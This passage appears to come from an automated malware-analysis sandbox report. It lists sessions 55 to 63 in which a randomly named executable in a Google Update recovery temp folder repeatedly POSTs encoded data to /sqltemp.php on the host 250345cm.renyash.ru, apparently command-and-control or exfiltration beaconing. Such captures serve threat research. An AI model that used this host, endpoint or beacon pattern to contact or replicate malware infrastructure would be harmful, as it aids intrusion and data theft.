                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=56YrcE1CYQKPQP8w79NMAAAY7Yr%2BmcxQ2ETKkvo4WuNr%2BvGvttWUTp8EzOVnJpUlf6M1VwijnFh2vrqmdxzc3Z16QBUZb9zqeBvG7nNVczW77iYC%2FFseRI4Oyw3%2BYwSj4Ex9VgLG"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364a0a84643bb-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7907&min_rtt=1747&rtt_var=12975&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=28612&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  55192.168.2.662690104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:55.160346031 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:55.516705036 CET1124OUTData Raw: 56 51 5f 5c 54 59 51 50 58 56 52 59 56 5c 59 5e 5b 5f 54 5f 55 5e 50 5f 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VQ_\TYQPXVRYV\Y^[_T_U^P_Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$/%Z7?>$.C,\% [(()- Y4<+6%?9*&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:02:55.605273962 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:55.894943953 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:55 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wc8j9sk02sygY%2Bi3axULcvsPN7PwHY0NCXlEgkM0dDwH9DL02bUV8fTZoSyCa7S9Y5M0L62drMVGef%2FEkaETxYy4pf2ZBXS70AbF0dAhTwPN%2F7R7qiEah%2Bj0q4V14944d1PNi9ML"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364a54ec342cc-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2593&min_rtt=2199&rtt_var=1614&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=272591&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  56192.168.2.662691104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:56.019465923 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:56.375916958 CET1124OUTData Raw: 53 52 5f 57 54 5a 51 55 58 56 52 59 56 58 59 5e 5b 5a 54 5a 55 5a 50 5f 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SR_WTZQUXVRYVXY^[ZTZUZP_Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.^': ?Y$>+;*9S#<4)> <&&?/.&Y.,Y-%


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  57192.168.2.662692104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:56.444670916 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1936
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:56.797801018 CET1936OUTData Raw: 56 56 5f 53 51 5c 54 53 58 56 52 59 56 5f 59 5f 5b 5a 54 5a 55 58 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VV_SQ\TSXVRYV_Y_[ZTZUXP^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-'-\4' 8\:4;(<*?#3?=C%<#W-&Y.,Y-9
                                                                                                                  Jan 1, 2025 16:02:56.915550947 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:57.178294897 CET954INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:57 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mn6xjwc37HMp4eaTbHN1oBVBOqxrfme4MHbd0o28cWKj85A9gr9%2BdHpwyhuuWgbokj6vhJzM5oKeNNb4pPRgPGdYDHXiRsOhHAy7sycEwRAzEjQ8FE882oVRNBqgXrFdRnQNO%2BYb"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364ad7dba3300-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=20195&min_rtt=16056&rtt_var=14299&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2238&delivery_rate=29694&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 1c 3e 3d 25 0d 24 32 02 5c 28 03 23 52 27 3d 2e 59 3f 06 07 00 27 3e 23 11 2a 17 05 11 36 3f 3e 07 26 38 23 00 23 13 23 5f 24 1e 2b 59 05 1c 20 44 36 01 2c 11 28 3d 09 5e 31 06 3d 5c 26 3d 28 5e 3f 3b 37 0a 20 3b 24 06 24 2d 16 59 29 14 28 1f 27 2f 2f 5b 2d 11 25 53 33 00 2c 54 00 11 26 1c 33 08 3b 05 23 0e 30 1f 22 0f 17 58 26 42 32 1b 32 3c 06 09 20 17 08 58 31 0b 23 59 22 23 25 03 25 5d 3e 03 37 13 28 0a 3e 14 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%>=%$2\(#R'=.Y?'>#*6?>&8###_$+Y D6,(=^1=\&=(^?;7 ;$$-Y)('//[-%S3,T&3;#0"X&B22< X1#Y"#%%]>7(>%S -H?WS0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  58192.168.2.662693104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:56.566843987 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:56.922776937 CET1124OUTData Raw: 56 53 5a 50 51 5b 54 54 58 56 52 59 56 5c 59 50 5b 58 54 51 55 5a 50 55 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VSZPQ[TTXVRYV\YP[XTQUZPUZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y&?41X%>+A.)=V#$Z*9?>(X 2++=%/9&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:02:57.043538094 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:57.307996988 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:57 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BMUOxd6oPBJRF5HgEBfaxvRTxDfct0mIUfm5vnuNicwG5f3Uf9rnDFzkfJzO7J24YC2wSbhqDQEFydPQJDwF%2FXSnYvTjKA29Xc%2Bst3n%2BDnJyqyTwRn4MXAZk13EuhYluwlTlCJXE"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364ae3b0243ad-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7647&min_rtt=1650&rtt_var=12613&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=29418&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  59192.168.2.662695104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:57.462373018 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:57.813605070 CET1124OUTData Raw: 56 50 5f 55 54 5f 54 54 58 56 52 59 56 5c 59 56 5b 5c 54 50 55 5c 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VP_UT_TTXVRYV\YV[\TPU\PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.^$4-3=#/\-R7=?* )-;4'+E$??U:&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:02:57.934504032 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:58.203170061 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:58 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IApTrA%2FUAanQJ31BpCrsg23ngMNYFfWFHBCmts4X4v%2F3AjgwUrwOeBVvzZFwxa0NBOYt9OuNlTwhqCcC5gp1K7yI0iJnIkVFeqTXXXXXFDVs4Bnd0pfRezEL8TMSq%2BM%2BEgZb9sud"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364b3cf3c5e62-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=9821&min_rtt=1691&rtt_var=16895&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=21877&cwnd=138&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  60192.168.2.662696104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:58.331763029 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:02:58.688498020 CET1124OUTData Raw: 53 50 5a 53 54 50 54 51 58 56 52 59 56 5c 59 53 5b 52 54 5d 55 5b 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SPZSTPTQXVRYV\YS[RT]U[PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$4$= .:T -?)U==;42(-A%?T-*&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:02:58.784244061 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:59.045042992 CET802INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:58 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NHJtfbIGsNIWTGsOvxGUFAY10KgZPo6TVGEso%2BTY8qFI0lS%2FRgSr9zLQQOBMRW83ydTm4y2MQtwgtCU3XCQcBzivCAB5on2qGEWZSPleNaOsm6Q20w7zF1he7yiSq1k22vUgPFyl"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364b91ff98ccd-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4835&min_rtt=2051&rtt_var=6338&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=60013&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  61192.168.2.662697104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:02:59.173705101 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:02:59.532166004 CET1124OUTData Raw: 53 52 5f 55 54 5e 54 5d 58 56 52 59 56 50 59 5e 5b 5c 54 5b 55 55 50 55 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SR_UT^T]XVRYVPY^[\T[UUPUZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$> !X3X48\%V#-;?3W*X' [+]"%',*&Y.,Y-
                                                                                                                  Jan 1, 2025 16:02:59.618066072 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:02:59.880044937 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:02:59 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j5eB%2BP2Lvu4KsxCpa1sSgrd2b3b8GZVbP%2F8o1nDUovOOAlSTwGSEnBkaI5AF5AUt0zI%2BsBUD2a35v8ovzGHKootX%2F4CV%2Bi8aBNdmMOAdrcOuu9MshyRJWxAfuUd5g9puSpm5jBIj"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364be5dbbc463-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2213&min_rtt=1471&rtt_var=2037&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=196977&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  62192.168.2.662698104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:00.005923033 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:00.360438108 CET1124OUTData Raw: 53 52 5a 54 51 5d 51 56 58 56 52 59 56 5a 59 56 5b 5a 54 5a 55 55 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SRZTQ]QVXVRYVZYV[ZTZUUPXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-0Y9\ ,:'.,"#.8X+9R*-' 1<(+:&S:&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:00.457968950 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:00.717327118 CET808INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:00 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zt086lOWmA4iQOZwPUqLx267lkIDcnKDtZcu%2FzTKhFBXYlGIUW%2FgU%2FUIWTF74I2Va7z5ob%2BbokW0t4dwVa8qYTH4btm9tKc8RPcIHntB4mzr1vruXc8XX2ISjOsVip5da5%2BmH466"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364c39be2186d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4228&min_rtt=1460&rtt_var=6083&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=61853&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  63192.168.2.662699104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:00.848855019 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:01.205779076 CET1124OUTData Raw: 56 53 5f 52 54 5e 54 51 58 56 52 59 56 51 59 50 5b 5a 54 5b 55 58 50 5f 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VS_RT^TQXVRYVQYP[ZT[UXP_Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$%7=^'>8,:9R <[<'><] "(*(>&<;:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:01.293412924 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:01.559045076 CET803INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:01 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hz7A8y3zHgQK9SdxhsfAa8POVpePiaLI2EqW2yxus7b65JzfiW9FHnZuxwjHOYP%2BPGNHmvHEaPimNCMc06NKeCmyiSo0%2FOnav67I4GM4BF8johjBrcQhYR26TDlpDc2aLBktbXyw"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364c8ca288cc5-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2565&min_rtt=2016&rtt_var=1854&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=227733&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
